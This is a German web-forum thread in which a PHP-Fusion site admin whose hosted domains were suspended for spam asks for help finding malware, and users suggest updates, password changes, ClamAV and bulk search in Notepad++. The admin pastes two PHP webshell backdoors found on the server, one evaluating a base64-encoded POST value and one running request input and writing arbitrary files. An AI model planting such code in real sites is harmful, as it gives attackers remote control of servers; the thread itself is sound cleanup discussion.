Thread Verfasser: bvbfanessen
Thread ID: 271
Thread Info
Es gibt 27 Beiträge zu diesem Thema, und es wurde 11588 Mal angesehen.  Ausserdem wurden Dateien angehängt.

 Thema drucken
Seiten gesperrt wegen Spamverdacht !
bvbfanessen
Hallo Leute, ich verzweifel gerade , mein Hoster hat mir alle Domains gesperrt ( Ich bin nur Ersteller und Verwalter der Homepages , Besitzer ist jemand anderes ) !!

Es wurden laut Strato Spammails, über die Domains verschickt und angeblich auch Malware.

Ich habe die komplette Ordnerstruktur nun ausm Root auf meinen Rechner gezogen und mit verschiedenen Programmen durschsucht. Ich habe auch einiges gefunden und auch gelöscht ( keine Fusion Dateien ).

Es waren Schadhafte .php Dateien und auch ( selbstgemachte )Bilder in denen sich etwas versteckt hat.

Gibt es eventuell noch eine andere Möglichkeit, das man da noch Schadhafte Dateien findet ?

Laut Strato wurde angeblich von aussen Zugegriffen, obwohl wir nen Schreibschutz auf dem Server aktiviert hatten.

Weiss da jemand zufällig noch nen Rat um Schadhafte Dateien zu finden und beseitigen zu lassen ?!

Würde auch jemandem der sich gut auskennt mal FTP Daten zukommen lassen oder den kompletten Strukturordner den ich lokal gespeichert habe oder per Teamviewer oder was auch immer Hauptsache die Seiten werden wieder freigeschaltet !
 
Dat Tunes
Ja gibt es, dazu muss man aber einen eigenen Server haben um dies Installieren zu können.

http://blog.serverbiz.de/automatische...nux-debian

Den Postausgang mal checken, geht aber auch nur bei Servern nicht bei Webhosting.

Fusion sollte dann dringend geupdatet werden, den dann wird noch eine alte Version genutzt, bei 7.02.07 sind die lücken dazu geschlossen. FTP, MySQL PW usw. auch ändern.

Ansonsten kannst du nur ein altes Backup einspielen und hoffen das dann ruhe ist.
Das Problem ist nicht das Problem, das Problem ist der Nutzer, der das Problem verursacht.
Was lernen wir ?
Wir entfernen einfach den Nutzer und das Problem ist gelöst !

Sollte das Problem nicht gelöst sein, WD40! WD40 hilft immer !
 
bvbfanessen
Nen Server haben wir ja von Strato. Der ist ja auch kostenpflichtig.

Der Root sieht folgendermaßen aus.

Hauptverzeichnis ( VLmeteor.de )
In dem Verzeichnis sind die Unterordner ( drk , schwarzgelb, test ) mit drin wo auch die Domains aufgeschaltet sind. wenn ich jetzt den Schutz ins Hauptverzeichnis kopiere ( vlmeteor ) funktioniert das dann auch ? Weil von da aus sind ja die ganzen Sachen geschickt worden.

Die Seite ist ja auf dem aktuellsten Stand bzw. alle Seiten sind mit 7.02.07 erstellt worden !! Deswegen wundert mich das ja !
 
Dat Tunes
Dann mal ClamAV auf dem Serverinstallieren, wichtig ist da, das man sich als RootUser auf dem Server einlogt bzw. in der SSH Ebene.
Danach ClamAV laufen lassen.
Das Problem ist nicht das Problem, das Problem ist der Nutzer, der das Problem verursacht.
Was lernen wir ?
Wir entfernen einfach den Nutzer und das Problem ist gelöst !

Sollte das Problem nicht gelöst sein, WD40! WD40 hilft immer !
 
bvbfanessen
Das heisst ich installiere die Exe Datei direkt im Root Server ?!
 
Dat Tunes
Wenn es nen Windows Server ist, dann gehts nicht.
Das geht nur unter Windows wie in der Anleitung der hinter dem Link ist.
Das Problem ist nicht das Problem, das Problem ist der Nutzer, der das Problem verursacht.
Was lernen wir ?
Wir entfernen einfach den Nutzer und das Problem ist gelöst !

Sollte das Problem nicht gelöst sein, WD40! WD40 hilft immer !
 
bvbfanessen
Das ist kein Windwos Server soweit ich das weiss
 
John Doe
Gefährliches Halbwissen....

Ist das ein ROOT-Server auf dem Du da rumspielst oder ist das ein ganz normaler Webspace von Strato den der gute Mann da nutzt?

Du kannst offensichtlich mit Begriffen wie "Root" oder "SSH" nicht allzuviel anfangen... von daher lass da bitte entweder jemanden ran der sich wirklich damit auskennt (wenn es ein Rootserver ist) oder durchsuche händisch ALLE Dateien auf dem Webspace nach Schadcode (der ist in aller Regel leicht erkennbar).

Ausserdem ändere SÄMTLICHE Passwörter, das schliesst sowohl die Passwörter für die Mailaccounts ein als auch Admin, Superadmin, FTP und Datenbanken. Ausserdem solltest Du auch mal deinen eigenen Rechner einem Komplettscan unterziehen, wenn da Schadsoftware drauf ist nutzt der ganze Aufwand am Server nix.
 
bvbfanessen
Ich habe schon verstanden was du meinst :-) es ist ein ganz normaler Webspace von Strato ! Und ich habe ja schon alles nachgesucht, Strato hat mir ja auch gesagt es gibt auf dem Server ne Datei Namens z.php, die habe ich ja gelöscht und auch alles andere was so "aufgetaucht ist" ! Ich suche jetzt nur etwas um die ganze Sache zu schützen damit das ganze mal bearbeitet werden kann, dieses Sitelock von Strato bringt auch nciht wirklich viel, weil das Teil andauernd anzeigt , keine Probleme vorhanden ! Dann frage ich mich,warum die Seite gesperrt wurde :/
 
John Doe
Wird die aktuelle Version von Fusion genutzt? Wenn nein - UPDATEN!
Welche Addons sind auf der Seite bzw den Seiten installiert?
PHP-Fusion selbst in der aktuellen Version hat keine bekannten Sicherheitslücken, die eine File- oder SQL-Injection möglich machen.

Die Verwendung von sicheren Passwörtern ("geheim","schnullerbacke38" oder "radiopasswort" sind KEINE sicheren Passwörter) sollte ebenso selbstverständlich sein wie der pflegliche und verantwortungsbewusste Umgang mit CHMODs.

Einige Addons, vor Allem die etwas "älteren" und nicht sauber programmierten Infusionen, bergen oftmals ungeahntes Potenzial für Scriptkiddies und "Möchtegern-Hacker".

Auch externe Scripte sind hierbei zu beachten, die Lücke muss nicht zwangsläufig bei Fusion oder dessen Erweiterungen zu finden sein.
 
bvbfanessen
Also einige Scripte sind schon drauf ( infusionenn oder mods ) allerdings achte ich immer auf Updates aber es gibt wie du schons agst ja leider ältere Versionen die nicht mehr geupdatet werden.Das Problem ist, wie findet man bei den Scripten Sicherheitslücken ?
Die aktuellsten Versionen sind drauf ( hab die de Version von hier )

Ich habe mal nen Bild angehangen, bin eh gerade am ausmisten, sind viel zu viel Dateien, vielleicht sieht man ja das Script wo die Lücke ist oder bekannt ist !

Folgender Code ist in den Dateien Vorhanden, kann man den irgendwie rausfiltern ? Ist ja umständlich alles von Hand zu durchsuchen !!

<?php eval(base64_decode($_POST['n9cb8ee']));?>
bvbfanessen hat folgende Datei angehängt:
Du hast nicht die Berechtigung die Anhäge dieses Themas zu sehen.

Bearbeitet von bvbfanessen am 30.06.2014 um 17:02
 
Dat Tunes
Du kannst zb. bei einigen Editoren 20 - 30 geöffnete Dokumente durchsuchen auf einmal, denke aber eher, das es ein BASE Code ist, das der jedes mal anders sein wird.
Das Problem ist nicht das Problem, das Problem ist der Nutzer, der das Problem verursacht.
Was lernen wir ?
Wir entfernen einfach den Nutzer und das Problem ist gelöst !

Sollte das Problem nicht gelöst sein, WD40! WD40 hilft immer !
 
bvbfanessen
Der Code ist immer der gleiche nur die Zeichen im ['zeichen'] sind immer anders. Mit welchem Editor könnte man das denn machen ?!
 
Dat Tunes
Ich nutze PHP Designer 7, der kostet aber. Es gibt aber auch eine 30 Tage Demo. Mite Notepad++ sollte es auch gehen.
Das Problem ist nicht das Problem, das Problem ist der Nutzer, der das Problem verursacht.
Was lernen wir ?
Wir entfernen einfach den Nutzer und das Problem ist gelöst !

Sollte das Problem nicht gelöst sein, WD40! WD40 hilft immer !
 
ThickBox
Hi,

also solch <?php eval(base64_decode($_POST['n9cb8ee']));?> einen Code zu finden, ist recht einfach mit Notepad++. STRG+ F und in der dritten "Karteikarte" kannst du angeben, was gesucht und durch was es ersetzt werden soll und in welchen Ordner. Also erstmal den Webspace runterladen und dann drüber gehen. So habe ich bei einem Bekannten, der auch solch ähnliches Problem hatte, innerhalb 5 min. alles raus gehauen. Der durchsucht, ändert und speichert automatisch alle bearbeiteten Dateien.

Bevor du das geänderte hoch lädst, lösche alles was aufm Space ist! Sicher ist Sicher!

Hoffe, dass es etwas hilft Smile
Aktuell inaktiv seit 12/2013 wegen privaten Gründen!
 
bvbfanessen
Aber haut mir das nicht die Seite durcheinander wenn ich den Webspace komplett lösche und dann einfach wieder hochlade ? Wegen Datenbankeinträgen usw.
 
ThickBox
Es geht hier rein um die Dateien - nicht um die Datenbank!
Du änderst in den Dateien ja nur den entsprechenden genau passenden Teil vom Code her, der da eh nicht rein gehört und speichern tut es sich automatisch und lädst es wieder hoch. An der Datenbank würde ich da noch nichts machen. Du kannst innerhalb der Datenbank, um sicher zu stellen, das sich da nichts befindet was nicht reingehört, durch die Suchfunktion der Datenbank selbst z.b. phpMyAdmin, nach schadhaften Code suchen.
Aktuell inaktiv seit 12/2013 wegen privaten Gründen!
 
bvbfanessen
Also ich habe meine index.phps nochmal durchgesehen und folgenden Code gefunden,

<?php $odlff = "a8b38c4cb6942c850cd11939e470b992"; if(isset($_REQUEST['iotn'])) { $boqw = $_REQUEST['iotn']; eval($boqw); exit(); } if(isset($_REQUEST['qazbmt'])) { $kuzr = $_REQUEST['tmee']; $wukzcy = $_REQUEST['qazbmt']; $qdueurq = fopen($wukzcy, 'w'); $rpldi = fwrite($qdueurq, $kuzr); fclose($qdueurq); echo $rpldi; exit(); }

?>

Ich gehe mal davon aus das es auch ein Schadcode ist ?!
zumindest sieht das ganze für mich so aus !
 
Systemweb
100% Schadcode!

EDIT:
Unbedingt auch schnellstmöglich FTP-Passwörter ändern!
Wer Filezilla benutzt sollte darin keine Passwörter speichern, weil FZ diese PWs im Klartext in einer separaten Datei abspeichert. Hierfür kursiert seit langem ein Wurm-Virus, der alle PWs dieser Datei "klaut".

Da ich selbst Hoster bin kann ich bestätigen, dass mittlerweile die meisten Infektionen mittels gekaperten FTP-Daten erfolgen.
Bearbeitet von Systemweb am 01.07.2014 um 12:45
 
bvbfanessen
FTP Passwörter sind schon geändert, MasterPW beim Anbieter auch ! Wo kann man die Dateien denn verschlüsseln ? bzw. wo kann man die sehen ?
 

Springe ins Forum: